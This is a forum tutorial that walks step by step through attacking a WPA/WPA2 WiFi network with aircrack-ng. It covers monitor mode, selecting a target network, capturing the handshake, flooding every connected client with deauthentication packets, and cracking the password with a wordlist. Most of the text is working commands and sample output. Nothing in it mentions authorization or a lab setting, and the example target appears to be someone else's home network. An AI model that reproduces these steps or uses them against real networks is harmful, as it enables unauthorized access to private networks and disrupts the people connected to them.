👨‍🏫 Tutorial WiFi häçking | Deauthenticate and Capture the Handshake

Aides

Prerequisites:

  • Linux Machine | WSL
  • Network Interface Card (NIC) that supports Monitor Mode | Packet Injection

Check if your NIC supports monitor mode
In your terminal run the following command:
Code:
iw list | grep -A8 "Supported interface modes"
You will see a response something like this.
Code:
Supported interface modes:
  * IBSS
  * managed
  * AP
  * AP/VLAN
  * monitor # We are looking for this
  * P2P-client
  * P2P-GO
  * P2P-device
If your network interface card (NIC) doesn't support it, you can buy an external WiFi adapter online.

Installing necessary packages
In your terminal run the following commands:
Code:
sudo apt update -y && sudo apt upgrade -y
sudo apt install aircrack-ng
Verify the installation:
Code:
aircrack-ng --help
Get your network interface card name.
In your terminal run the following command:
Code:
iwconfig
You will see a response something like this:
Code:
lo          no wireless extensions.
wlp0s20f3   IEEE 802.11  ESSID:"ALHN-2E25"
            Mode:Managed  Frequency:5.805 GHz  Access Point: 90:75:BC:22:19:5D
            Bit Rate=130 Mb/s   Tx-Power=22 dBm
            Retry short limit:7   RTS thr:off   Fragment thr:off
            Power Management:on
            Link Quality=39/70  Signal level=-71 dBm
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
            Tx excessive retries:10  Invalid misc:1417   Missed beacon:0
As you can see, wlp0s20f3 is in Managed mode.

Kill interfering processes
In your terminal run the following command:
Notes:
- Running this command will disconnect you from the internet
Code:
sudo airmon-ng check kill
Switch to monitor mode
In your terminal run the following command:
Code:
sudo airmon-ng start `[network interface card name]`
Notes:
- Replace the placeholder with your own interface name. Mine is wlp0s20f3; yours may be wlan0. This is why we looked up the network interface card name earlier.
To verify that you switched to monitor mode, run the following command:
Code:
iwconfig
You will see a response something like this:
Code:
lo            no wireless extensions.
wlp0s20f3mon  IEEE 802.11  ESSID:"ALHN-2E25"
              Mode:Monitor  Frequency:5.805 GHz  Access Point: 90:75:BC:22:19:5D
              Bit Rate=130 Mb/s   Tx-Power=22 dBm
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Power Management:on
              Link Quality=39/70  Signal level=-71 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:10  Invalid misc:1417   Missed beacon:0
As you can see, wlp0s20f3 is now wlp0s20f3mon; airmon-ng renames it to avoid undefined behavior if you switch back to managed mode later on.

Find your target
In your terminal run the following command:
Code:
sudo airodump-ng `[network interface card name]`
You will see a response something like this:
Code:
[ CH 14 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ]
 BSSID              PWR  Beacons      Data, /s  CH   MB   ENC CIPHER  AUTH ESSID
 A2:3E:8C:10:D8:56  -62        8       45    2   2  130   WPA2 CCMP   PSK  Kapalangga ❤️
I only show our target here for this tutorial; in your case you will see many more rows.
Notes:
  • Write down the BSSID, CH and ESSID of your target.
  • The attack only works on WPA/WPA2, so make sure your target uses it too. You can verify this by reading the encryption (ENC) column.

Capture the Handshake
There are different ways to capture the handshake, but in this tutorial we will focus solely on the aircrack-ng tools.
I assume you have already done the recon part, the "Find your target" section.
You should now have the following details of your target:
  • BSSID
  • ESSID
  • CH
In your terminal run the following command:
Code:
sudo airodump-ng wlp0s20f3mon --bssid "A2:3E:8C:10:D8:56" --essid "Kapalangga ❤️" --channel 1 --write "capture"
You will see a response something like this:
Code:
[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ]
 BSSID              PWR  Beacons      Data, /s  CH   MB   ENC CIPHER  AUTH ESSID
 A2:3E:8C:10:D8:56  -62        8       45    2   2  130   WPA2 CCMP   PSK  Kapalangga ❤️
You might notice that this looks like the "Find your target" section, because it is. We just tell our network interface to focus on this BSSID, channel and ESSID, and save the captured packets to files with the "capture" prefix.
Do not exit this terminal while deauthenticating, until we successfully capture the handshake. You will see something like this when it has been captured:
Code:
[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ] [ WPA Handshake: "A2:3E:8C:10:D8:56" ]
Notes:
  • Do not close this terminal
  • Open a new terminal for the next steps
Deauthenticate Clients
We could deauthenticate all clients from the target network or target a single client; in this tutorial we will deauthenticate all clients. It's noisy, but it will do the job.
In your terminal run the following command:
Code:
sudo aireplay-ng -a "A2:3E:8C:10:D8:56" --deauth 0 "wlp0s20f3mon"
This sends deauthentication packets to all clients connected to the target network. Disconnecting them forces the handshake we need: clients are forced to reconnect, so we don't have to wait for new devices to connect.

Waiting Game
Now that we are deauthenticating clients and listening for incoming handshakes, we wait patiently. Wear your hood and observe. The hood is mandatory.
Go back to the other terminal I said not to close and wait for something like this:
Code:
[ CH 1 ][ Elapsed: 1 min ][ 2026-04-17 19:00 ] [ WPA Handshake: "A2:3E:8C:10:D8:56" ]
Once you have captured the handshake, you can safely close it and stop the terminal that is deauthenticating clients.
You can open your file manager or check by running ls in the terminal.
You should see something like this:
  • capture-01.cap
  • capture-01.csv
  • etc.
We only need the capture-01.cap.

Crack the password
There are a lot of ways to do it, and plenty of tutorials on YouTube. In this tutorial we will use a dictionary attack; do not go straight for brute force, it's time consuming and should be the last resort.
If you don't have a dictionary, you can download one (look for a tutorial on YouTube). I would highly suggest rockyou. You can even generate one using AI. There is also a default dictionary installed along with the aircrack-ng tools, which we will use in this tutorial.
Now that you have it, run the following commands in the terminal:
Code:
sudo aircrack-ng "capture-01.cap" -w "/usr/share/dict/wordlist-probable.txt"
If it succeeds, you will see something like this:
Code:
KEY FOUND: "password123"
Otherwise, try another dictionary or find a YouTube tutorial on hashcat (brute forcing).

If you have any questions, just comment. Keep sharing, everyone. <3
 
